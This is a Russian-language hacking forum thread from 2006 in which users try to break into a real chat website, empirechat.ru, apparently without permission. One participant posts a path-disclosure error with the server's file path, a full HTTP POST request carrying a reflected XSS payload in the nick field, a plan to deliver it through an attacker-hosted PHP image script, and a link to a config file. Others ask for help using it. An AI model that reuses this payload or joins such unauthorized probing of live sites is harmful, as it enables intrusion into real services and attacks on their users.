PDA

Просмотр полной версии : Империя

.Slip
25.01.2006, 17:36
августовский чат, http://www.empirechat.ru/
неплохо всё зализано... ...пытался скрипты запустить, не прокатило... :mad: продолжаю мучить его... просьба, о вашей помощи....
.Slip
25.01.2006, 17:42
кстати, просмотр html кода, там замазан... вообще лажа...
.Slip
25.01.2006, 22:05
..хм... ..пол дня ковырял... ..бестолку.. ..или не то делаю, или всё пофиксили...
D1mOn
25.01.2006, 22:19
пофиксили, пофиксили...
max_pain89
25.01.2006, 22:25
я нашел пассивные XSS и раскрытие пути

<br />
<b>Warning</b>: session_register(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in <b>/vhosts/august4u.ru/htdocs/people/include/lost.inc</b> on line <b>6</b>
D1mOn
25.01.2006, 22:27
а где именно там Xss???
max_pain89
25.01.2006, 22:45
требует от пользователя зайти на твою страничку, но если еще поискать, то можно найти и встроенную

на страничке должна быть картинка-пхпскрипт, отправляющий вот такой пост запрос
POST http://www.empirechat.ru/people/lost HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-powerpoint, application/x-shockwave-flash, application/vnd.ms-excel, application/x-icq, */*
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Host: www.empirechat.ru
Content-Length: 188
Cookie: cid=1763615311; hotlog=1; b=b

PasswordHint=a61d2fc4de414293ba65bafcdd47b84a&nick=administrator<script>alert()</script>
max_pain89
25.01.2006, 22:46
нашел конфигурационный файл, ничего интересного _http://august4u.ru/include/cfg.inc
.Slip
25.01.2006, 22:55
требует от пользователя зайти на твою страничку, но если еще поискать, то можно найти и встроенную

на страничке должна быть картинка-пхпскрипт, отправляющий вот такой пост запрос
мля, во первых вынесли из чата... ..и ещё, можно ли, всё что ты написал в цитате, использовать для ковыряния? если да, то подскажи как...
.Slip
27.01.2006, 15:47
ЛЮДи, никто ничего не нашёл? или просто все забили?
L.S.D.
28.01.2006, 23:37
А то то он там кричал, что он супер хакер! мха-ха-ха-ха-ха-ха
.Slip
29.01.2006, 00:29
А то то он там кричал, что он супер хакер! мха-ха-ха-ха-ха-ха
бля, иногда офигеваю, от таких людей как ты, трепло просто... вот ты сможешь доказать, что я так говорил? ЛОЛ, и какого тут флудить всякой лажой?
L.S.D.
29.01.2006, 02:17
конечно)) там логи пишутся=) ЛОЛ!
А вообще то мне пофигу.
Не будем устраивать флэйм.
.Slip
29.01.2006, 02:48
один х, сюда никто ничё не пишет....конечно)) там логи пишутся=) ЛОЛ!
А вообще то мне пофигу.
Не будем устраивать флэйм.
хм, ну давай, докажи)) ЛОЛ) логи, я даже не начинал проверять... и вообще, думай что хочешь)